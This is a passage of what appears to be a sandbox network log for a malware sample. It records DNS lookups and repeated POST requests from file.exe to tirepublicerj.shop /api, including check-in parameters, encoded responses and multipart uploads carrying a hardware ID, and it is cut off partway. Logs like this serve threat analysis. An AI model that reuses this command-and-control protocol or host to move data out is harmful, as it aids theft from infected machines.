                                                      Jan 4, 2025 22:58:07.472575903 CET1.1.1.1192.168.2.40xa231No error (0)tirepublicerj.shop104.21.96.1A (IP address)IN (0x0001)false
                                                      Jan 4, 2025 22:58:07.472575903 CET1.1.1.1192.168.2.40xa231No error (0)tirepublicerj.shop104.21.112.1A (IP address)IN (0x0001)false
                                                      • tirepublicerj.shop
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449733104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:08 UTC265OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 8
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                      Data Ascii: act=life
                                                      2025-01-04 21:58:08 UTC1132INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:08 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=n9qcie9qjbkd949e6ad63hjqhh; expires=Wed, 30 Apr 2025 15:44:47 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvQdPnEpODhOcgqlsRGGw%2FD9TBCPD2zfHBNrwJqhy5VN7FaIqKWKbmPcbw%2B3OfIghAZQBTtH3rkFYvRFR0Oo%2BfCnccck2YS%2BCwDhKUxgwld9jz5gxPhfZv7wuaxKkmhUOEwnKr8%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7cfd186dc358-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=25236&min_rtt=1695&rtt_var=14693&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1722713&cwnd=155&unsent_bytes=0&cid=a2ee32fb96d1c7ad&ts=530&x=0"
                                                      2025-01-04 21:58:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                      Data Ascii: 2ok
                                                      2025-01-04 21:58:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449735104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:09 UTC266OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 42
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:09 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 58 70 4c 59 33 32 2d 2d 26 6a 3d
                                                      Data Ascii: act=recive_message&ver=4.0&lid=XpLY32--&j=
                                                      2025-01-04 21:58:09 UTC1135INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:09 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=dpu6gp4igl3kbcofmgg0jlc3bh; expires=Wed, 30 Apr 2025 15:44:48 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Al5Q1z2NH4%2FCoo%2Bgj9KRUDzleasrcRbEXtl65D0QbZKEncPSmdZjeed906PEi0wCvfaVor5FSJPEDn6pri8X4UsH%2BozXyAoL2%2FHvdVBZaPrn1Jw%2BRPnk%2Fr5ewH%2BOzNhxEymbMBo%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7d02db3a4414-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1705&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=944&delivery_rate=1625835&cwnd=172&unsent_bytes=0&cid=00eff47a09584cb3&ts=478&x=0"
                                                      2025-01-04 21:58:09 UTC234INData Raw: 63 34 32 0d 0a 2b 31 73 51 34 71 41 76 34 43 35 48 74 75 54 55 5a 34 39 38 35 6e 6f 62 74 35 6a 6a 6d 43 36 70 4d 48 62 4d 53 61 74 46 6a 37 65 41 65 57 62 41 6d 68 76 4d 44 44 54 54 78 75 34 54 2f 51 6d 44 56 6a 6e 57 2f 4d 47 69 53 4d 68 63 42 61 6c 6c 69 54 50 69 6c 63 45 39 63 59 37 54 53 73 77 4d 49 73 37 47 37 6a 7a 30 58 6f 4d 55 4f 59 32 36 68 76 4a 4d 79 46 77 55 72 53 4c 45 4e 65 50 55 6b 7a 64 33 69 73 56 4d 68 45 38 72 32 34 47 78 41 75 34 57 69 42 4e 32 33 2f 58 42 74 41 7a 4d 53 6c 54 32 61 2b 59 67 2b 39 61 32 4f 6d 4f 4a 67 6c 4c 4d 56 57 58 54 69 76 5a 64 72 52 32 44 47 48 66 52 2f 49 6a 77 52 73 46 55 46 61 67 6a 32 79 7a 70 33 35 4d 35 64 49 76 50 52 5a 42 43 49 64 79 4b 74
                                                      Data Ascii: c42+1sQ4qAv4C5HtuTUZ4985nobt5jjmC6pMHbMSatFj7eAeWbAmhvMDDTTxu4T/QmDVjnW/MGiSMhcBalliTPilcE9cY7TSswMIs7G7jz0XoMUOY26hvJMyFwUrSLENePUkzd3isVMhE8r24GxAu4WiBN23/XBtAzMSlT2a+Yg+9a2OmOJglLMVWXTivZdrR2DGHfR/IjwRsFUFagj2yzp35M5dIvPRZBCIdyKt
                                                      2025-01-04 21:58:09 UTC1369INData Raw: 77 6a 75 58 73 70 59 66 73 32 36 32 62 6f 66 2b 56 45 46 76 7a 37 45 4e 2b 75 56 68 6e 64 72 77 4d 56 42 77 68 52 6c 33 49 71 34 41 4f 34 52 67 78 6c 35 78 2f 57 42 2b 55 54 44 56 68 36 68 4a 4d 59 70 35 39 4b 52 4d 48 57 50 78 55 57 45 51 79 61 55 79 50 59 43 39 56 37 63 57 46 6e 46 2b 59 4c 75 51 64 6f 53 43 2b 41 79 69 53 44 68 6c 63 46 35 64 49 37 44 51 49 4a 65 4c 64 2b 4e 73 78 66 6d 46 34 6b 56 65 64 6a 77 6a 76 6c 4d 7a 46 67 65 6f 53 48 4e 4b 75 44 54 6d 54 6b 79 7a 6f 4a 4b 6d 67 78 39 6c 4b 57 7a 46 65 6f 53 6b 6c 70 44 6c 65 58 50 34 77 7a 4d 58 6c 54 32 61 38 45 69 37 74 61 53 4e 6e 47 49 79 56 2b 43 58 69 50 5a 67 36 51 44 36 42 43 4f 47 32 76 66 39 49 66 35 52 63 42 62 45 61 6b 76 69 57 6d 74 30 6f 46 35 4b 73 44 6a 51 49 6c 41 4c 38 4f 47
                                                      Data Ascii: wjuXspYfs262bof+VEFvz7EN+uVhndrwMVBwhRl3Iq4AO4Rgxl5x/WB+UTDVh6hJMYp59KRMHWPxUWEQyaUyPYC9V7cWFnF+YLuQdoSC+AyiSDhlcF5dI7DQIJeLd+NsxfmF4kVedjwjvlMzFgeoSHNKuDTmTkyzoJKmgx9lKWzFeoSklpDleXP4wzMXlT2a8Ei7taSNnGIyV+CXiPZg6QD6BCOG2vf9If5RcBbEakviWmt0oF5KsDjQIlAL8OG
                                                      2025-01-04 21:58:09 UTC1369INData Raw: 79 45 46 47 76 5a 38 49 66 31 51 63 63 53 57 75 34 73 30 57 65 31 6c 62 4d 36 5a 6f 50 49 44 37 64 50 4b 39 71 42 6f 45 58 79 55 4a 31 59 66 74 6d 36 32 62 70 42 79 6c 6f 53 76 43 54 45 4a 4f 50 62 6c 6a 78 39 69 4d 4a 4e 6a 30 6b 68 33 34 32 31 43 4f 6b 4d 6a 68 68 78 30 50 75 4c 38 41 79 46 45 68 4f 32 61 35 46 6e 33 4d 4b 53 65 30 65 44 7a 45 4f 46 57 6d 58 4c 79 4b 39 46 36 68 4c 45 51 44 6e 59 38 6f 54 2f 51 38 70 59 47 71 73 68 78 53 2f 6a 31 6f 73 32 64 6f 44 4f 52 59 68 42 4b 39 43 4f 76 77 37 6d 47 49 51 5a 63 35 57 30 77 66 31 55 69 77 70 55 6d 69 7a 46 4b 75 4b 58 72 44 70 38 6a 73 56 62 77 6c 4e 72 7a 63 61 78 43 61 31 47 78 42 52 77 31 66 47 4c 2f 6b 7a 4d 58 78 47 74 4c 4d 6f 71 36 74 2b 58 50 6e 61 4d 79 30 43 45 54 43 4c 51 67 36 51 41 35
                                                      Data Ascii: yEFGvZ8If1QccSWu4s0We1lbM6ZoPID7dPK9qBoEXyUJ1Yftm62bpByloSvCTEJOPbljx9iMJNj0kh3421COkMjhhx0PuL8AyFEhO2a5Fn3MKSe0eDzEOFWmXLyK9F6hLEQDnY8oT/Q8pYGqshxS/j1os2doDORYhBK9COvw7mGIQZc5W0wf1UiwpUmizFKuKXrDp8jsVbwlNrzcaxCa1GxBRw1fGL/kzMXxGtLMoq6t+XPnaMy0CETCLQg6QA5
                                                      2025-01-04 21:58:09 UTC173INData Raw: 4d 32 2b 7a 42 35 51 4c 53 45 68 4f 69 61 35 46 6e 35 4e 79 4c 4e 33 79 4a 7a 30 75 4b 53 79 76 5a 6a 62 41 4f 36 68 6d 43 46 58 48 59 2f 34 4c 37 53 4d 46 41 46 36 55 68 78 43 32 74 6d 39 6b 2b 61 73 43 61 44 61 56 41 44 4d 53 64 70 42 4f 74 41 63 6f 42 4f 64 4c 32 77 61 49 4d 79 46 30 64 6f 53 50 42 4b 4f 4c 52 6c 7a 39 30 6a 63 64 43 69 46 34 74 32 6f 75 39 43 75 59 4d 68 42 56 39 32 66 36 4a 38 55 61 4c 48 46 53 70 4d 34 6c 2f 72 65 43 55 4e 6e 4b 44 31 41 32 64 41 6a 79 55 67 62 70 46 74 56 36 49 46 6e 0d 0a
                                                      Data Ascii: M2+zB5QLSEhOia5Fn5NyLN3yJz0uKSyvZjbAO6hmCFXHY/4L7SMFAF6UhxC2tm9k+asCaDaVADMSdpBOtAcoBOdL2waIMyF0doSPBKOLRlz90jcdCiF4t2ou9CuYMhBV92f6J8UaLHFSpM4l/reCUNnKD1A2dAjyUgbpFtV6IFn
                                                      2025-01-04 21:58:09 UTC1369INData Raw: 33 64 35 32 0d 0a 6e 61 39 6f 33 78 52 4d 70 65 47 71 6b 75 77 43 2f 6c 78 35 67 39 65 6f 48 4d 51 6f 4e 49 49 4e 47 43 73 51 48 72 45 63 52 57 4f 64 4c 69 77 61 49 4d 35 48 55 68 37 41 72 7a 5a 2f 4b 62 67 48 6c 31 6a 49 49 56 77 6b 41 6d 32 49 36 35 41 2b 51 53 6a 68 46 79 32 66 47 46 39 6b 58 4f 56 42 57 72 4c 73 67 6a 34 64 2b 66 4f 6e 47 50 7a 55 4b 4b 44 47 75 55 67 61 35 46 74 56 36 68 44 33 4c 62 2f 4d 48 6c 41 74 49 53 45 36 4a 72 6b 57 66 68 33 4a 38 2f 64 34 7a 44 53 34 70 4a 4c 64 43 48 73 41 50 75 45 59 41 64 65 4e 72 2b 6a 66 52 47 79 6c 4d 59 70 53 54 43 49 71 32 62 32 54 35 71 77 4a 6f 4e 73 30 38 7a 77 35 61 36 52 66 4a 51 6e 56 68 2b 32 62 72 5a 75 6b 33 5a 57 42 36 67 4c 73 59 69 37 74 71 65 4e 48 53 4d 79 45 53 4b 53 69 72 64 6c 4c 55
                                                      Data Ascii: 3d52na9o3xRMpeGqkuwC/lx5g9eoHMQoNIINGCsQHrEcRWOdLiwaIM5HUh7ArzZ/KbgHl1jIIVwkAm2I65A+QSjhFy2fGF9kXOVBWrLsgj4d+fOnGPzUKKDGuUga5FtV6hD3Lb/MHlAtISE6JrkWfh3J8/d4zDS4pJLdCHsAPuEYAdeNr+jfRGylMYpSTCIq2b2T5qwJoNs08zw5a6RfJQnVh+2brZuk3ZWB6gLsYi7tqeNHSMyESKSirdlLU
                                                      2025-01-04 21:58:09 UTC1369INData Raw: 42 78 30 31 65 69 4f 2f 55 76 43 57 51 61 6b 4c 4d 34 73 35 64 36 57 50 32 43 4d 7a 46 2b 48 58 6a 65 55 79 50 59 43 39 56 37 63 57 45 2f 53 36 70 48 35 44 76 70 45 46 37 67 67 78 43 75 74 79 74 63 67 4d 6f 66 4f 44 64 6f 4d 49 39 75 50 74 51 72 73 46 34 67 56 66 4e 7a 2f 67 50 78 49 77 56 67 55 71 43 33 49 49 75 66 57 6d 44 4e 37 68 38 70 4b 67 56 35 6c 6d 73 61 78 48 61 31 47 78 44 46 2b 78 2f 53 52 75 6c 4f 46 53 31 53 70 4a 34 6c 2f 72 64 47 54 4e 6e 61 48 7a 6b 75 48 53 69 6a 56 69 62 63 46 34 68 71 50 45 58 2f 55 39 34 54 33 53 4e 6c 59 48 36 45 6e 77 43 76 67 6c 64 64 35 64 5a 69 43 46 63 4a 39 4b 4e 71 49 73 52 4f 74 41 63 6f 42 4f 64 4c 32 77 61 49 4d 79 6c 34 62 72 53 54 4b 4a 4f 7a 66 69 79 74 2b 69 63 70 49 6a 6b 63 72 30 70 53 77 43 75 51 64
                                                      Data Ascii: Bx01eiO/UvCWQakLM4s5d6WP2CMzF+HXjeUyPYC9V7cWE/S6pH5DvpEF7ggxCutytcgMofODdoMI9uPtQrsF4gVfNz/gPxIwVgUqC3IIufWmDN7h8pKgV5lmsaxHa1GxDF+x/SRulOFS1SpJ4l/rdGTNnaHzkuHSijVibcF4hqPEX/U94T3SNlYH6EnwCvgldd5dZiCFcJ9KNqIsROtAcoBOdL2waIMyl4brSTKJOzfiyt+icpIjkcr0pSwCuQd
                                                      2025-01-04 21:58:09 UTC1369INData Raw: 57 36 7a 37 70 64 7a 45 4e 55 39 6a 33 5a 4d 4f 72 4b 31 79 41 79 68 38 34 4e 32 67 77 6a 33 59 43 78 41 2b 4d 4d 67 52 35 32 32 76 4f 49 2f 6b 54 49 55 68 43 71 4c 4d 77 6b 34 64 36 65 4f 6e 32 45 79 30 4f 4c 51 32 57 61 78 72 45 64 72 55 62 45 4f 57 4c 57 39 6f 79 36 55 34 56 4c 56 4b 6b 6e 69 58 2b 74 32 5a 63 38 63 6f 72 45 53 59 64 4b 4c 39 47 47 76 51 62 69 47 6f 49 63 64 74 58 78 69 50 74 4b 7a 6c 67 66 71 43 62 4b 49 65 75 56 31 33 6c 31 6d 49 49 56 77 6d 77 2b 32 59 71 78 52 66 4a 51 6e 56 68 2b 32 62 72 5a 75 6b 66 48 56 68 4f 75 4a 73 6f 76 36 4e 47 54 50 48 4b 49 30 45 57 43 53 7a 66 47 68 72 38 41 34 52 32 45 48 48 2f 63 2f 49 4c 2b 44 49 55 53 45 37 5a 72 6b 57 66 41 32 5a 34 51 64 5a 75 43 55 73 78 56 5a 64 4f 4b 39 6c 32 74 48 34 38 53 64
                                                      Data Ascii: W6z7pdzENU9j3ZMOrK1yAyh84N2gwj3YCxA+MMgR522vOI/kTIUhCqLMwk4d6eOn2Ey0OLQ2WaxrEdrUbEOWLW9oy6U4VLVKkniX+t2Zc8corESYdKL9GGvQbiGoIcdtXxiPtKzlgfqCbKIeuV13l1mIIVwmw+2YqxRfJQnVh+2brZukfHVhOuJsov6NGTPHKI0EWCSzfGhr8A4R2EHH/c/IL+DIUSE7ZrkWfA2Z4QdZuCUsxVZdOK9l2tH48Sd
                                                      2025-01-04 21:58:09 UTC1369INData Raw: 30 44 4d 6f 53 54 4a 63 79 69 54 47 74 6a 63 74 33 4d 70 4b 43 46 63 49 4c 4a 73 61 55 73 41 62 37 48 63 4d 6d 52 2f 4c 73 69 2f 31 63 7a 45 55 62 37 6d 57 4a 4b 4b 32 4e 6f 48 6c 37 68 39 6c 63 6c 45 45 31 30 38 61 4a 53 36 30 47 78 45 41 35 34 50 6d 50 39 45 76 64 51 31 6d 4a 50 63 4d 67 2f 64 4b 4f 4e 6a 4c 4f 67 6b 76 43 46 48 61 61 78 72 49 55 72 55 62 55 53 69 4b 41 71 64 61 71 48 74 51 63 44 65 34 39 69 58 2b 2f 6d 39 6b 72 4d 74 69 43 43 6f 46 65 4e 39 4b 46 6f 41 61 71 49 4c 6f 2f 59 39 6a 38 6c 75 74 79 39 56 55 4f 6f 79 33 65 4e 71 48 41 6d 6a 64 38 68 39 51 4e 7a 41 77 71 6c 4e 36 50 52 61 56 65 75 31 59 35 7a 62 72 5a 75 6e 6e 49 58 42 71 70 50 64 68 71 79 73 2b 55 50 32 57 52 67 67 50 43 53 6d 57 4d 31 50 68 46 36 51 2f 45 51 43 6d 48 6f 64
                                                      Data Ascii: 0DMoSTJcyiTGtjct3MpKCFcILJsaUsAb7HcMmR/Lsi/1czEUb7mWJKK2NoHl7h9lclEE108aJS60GxEA54PmP9EvdQ1mJPcMg/dKONjLOgkvCFHaaxrIUrUbUSiKAqdaqHtQcDe49iX+/m9krMtiCCoFeN9KFoAaqILo/Y9j8luty9VUOoy3eNqHAmjd8h9QNzAwqlN6PRaVeu1Y5zbrZunnIXBqpPdhqys+UP2WRggPCSmWM1PhF6Q/EQCmHod
                                                      2025-01-04 21:58:09 UTC1369INData Raw: 45 68 76 75 63 2f 42 6e 70 5a 57 6d 64 7a 4b 59 67 68 58 43 65 53 62 61 69 4c 45 54 2f 46 4f 73 4f 30 50 76 75 4b 33 39 57 59 6c 6d 45 37 34 36 77 69 72 68 6c 64 64 35 64 4d 43 61 48 63 77 4d 49 63 58 47 37 6c 57 2f 52 64 46 4c 4c 6f 57 6f 6e 72 52 56 69 30 52 55 39 6e 6d 48 5a 2f 2b 56 77 58 6b 31 67 39 42 66 68 45 38 7a 31 38 47 49 4f 38 6f 51 67 78 6c 76 78 65 32 4f 78 48 4c 65 55 52 71 67 4c 4e 38 32 72 5a 76 5a 4e 6a 4c 59 2b 77 33 4b 44 42 71 61 78 71 35 46 74 56 36 78 47 33 66 62 2f 5a 66 72 41 65 78 63 45 36 38 39 32 54 44 69 6c 64 64 35 64 4d 43 61 48 38 77 4d 49 63 58 47 37 6c 57 2f 52 64 46 4c 4c 6f 57 6f 6e 72 52 56 69 30 52 55 39 6e 6d 48 5a 2f 2b 56 77 58 6b 31 67 39 42 66 68 45 38 7a 31 38 47 49 4f 38 6f 51 67 78 6c 76 78 65 32 4f 74 57 4c
                                                      Data Ascii: Ehvuc/BnpZWmdzKYghXCeSbaiLET/FOsO0PvuK39WYlmE746wirhldd5dMCaHcwMIcXG7lW/RdFLLoWonrRVi0RU9nmHZ/+VwXk1g9BfhE8z18GIO8oQgxlvxe2OxHLeURqgLN82rZvZNjLY+w3KDBqaxq5FtV6xG3fb/ZfrAexcE6892TDildd5dMCaH8wMIcXG7lW/RdFLLoWonrRVi0RU9nmHZ/+VwXk1g9BfhE8z18GIO8oQgxlvxe2OtWL


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449737104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:10 UTC282OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=0BJTZMSTNMF6ZWXQ
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 18146
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:10 UTC15331OUTData Raw: 2d 2d 30 42 4a 54 5a 4d 53 54 4e 4d 46 36 5a 57 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 30 42 4a 54 5a 4d 53 54 4e 4d 46 36 5a 57 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 42 4a 54 5a 4d 53 54 4e 4d 46 36 5a 57 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 30 42 4a 54 5a 4d 53
                                                      Data Ascii: --0BJTZMSTNMF6ZWXQContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--0BJTZMSTNMF6ZWXQContent-Disposition: form-data; name="pid"2--0BJTZMSTNMF6ZWXQContent-Disposition: form-data; name="lid"XpLY32----0BJTZMS
                                                      2025-01-04 21:58:10 UTC2815OUTData Raw: e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11
                                                      Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                      2025-01-04 21:58:10 UTC1133INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=c4pp65knsa77pju47slbq76jrj; expires=Wed, 30 Apr 2025 15:44:49 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HnfC7GoMcuA3LpQpsfS%2BpQhZ3rfqhDlxXMko2v9CcwhB1WzTh2Cybwfpp8sXvzeKIezJyNklK8eZk%2BtJ%2FFvvaNoJuveFRmZrDP2j27B4ulruA6j4fTdazP%2BkQLbhrtBJ3Ue6s2E%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7d0a3cc44414-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1684&rtt_var=644&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19108&delivery_rate=1683967&cwnd=172&unsent_bytes=0&cid=fd8e5e89da654b06&ts=632&x=0"
                                                      2025-01-04 21:58:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-04 21:58:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449740104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:11 UTC274OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=UILB0NA6R
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 8725
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:11 UTC8725OUTData Raw: 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                      Data Ascii: --UILB0NA6RContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--UILB0NA6RContent-Disposition: form-data; name="pid"2--UILB0NA6RContent-Disposition: form-data; name="lid"XpLY32----UILB0NA6RContent-Dispositi
                                                      2025-01-04 21:58:11 UTC1137INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:11 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=ga4hofmufjoi4afsq4uv55d29i; expires=Wed, 30 Apr 2025 15:44:50 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYutpRT9cJy4FjcCGUOX5O%2BdPf7bHvRWPF1BDKr%2FghyyvxPmy8EAxehuB5%2Fd7FkK%2FlxIp8bC7iDCgRjqS5vr8kw9niL0OCqS0S374qgZCQKQ%2Bra%2BVHCTiICp4Fs7aNH8H%2F9M1n4%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7d112d4fde95-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1629&rtt_var=624&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9657&delivery_rate=1733966&cwnd=242&unsent_bytes=0&cid=2da2c7c8917bafa7&ts=467&x=0"
                                                      2025-01-04 21:58:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
